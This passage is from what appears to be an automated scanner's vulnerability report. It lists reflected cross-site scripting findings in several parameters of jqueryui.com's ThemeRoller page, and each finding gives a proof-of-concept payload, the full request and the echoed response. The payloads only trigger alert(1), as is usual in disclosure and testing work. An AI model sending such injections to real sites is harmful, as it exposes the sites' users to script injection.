opShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serife01a9"><script>alert(1)</script>9aceb87732b&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

2.69. http://jqueryui.com/themeroller/ [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31c8"><script>alert(1)</script>fa0c014bb49 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1ema31c8"><script>alert(1)</script>fa0c014bb49&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent
...[SNIP]...

2.70. http://jqueryui.com/themeroller/ [fwDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd043"><script>alert(1)</script>ac1313806c7 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120068

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&
...[SNIP]...

2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc56e"><script>alert(1)</script>b6fd687b91b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_so
...[SNIP]...

2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37bd2"><script>alert(1)</script>542322e3a20 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_h
...[SNIP]...

2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 121f8"><script>alert(1)</script>339bbf5b28c was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bg
...[SNIP]...

2.74. http://jqueryui.com/themeroller/ [iconColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f680b"><script>alert(1)</script>a08033f67f2 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f99b"><script>alert(1)</script>e7938fcd6a0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.pn
...[SNIP]...

2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6309"><script>alert(1)</script>9ad591495d9 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOv
...[SNIP]...

2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df23d"><script>alert(1)</script>420d9ca6e8e was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png
...[SNIP]...

2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

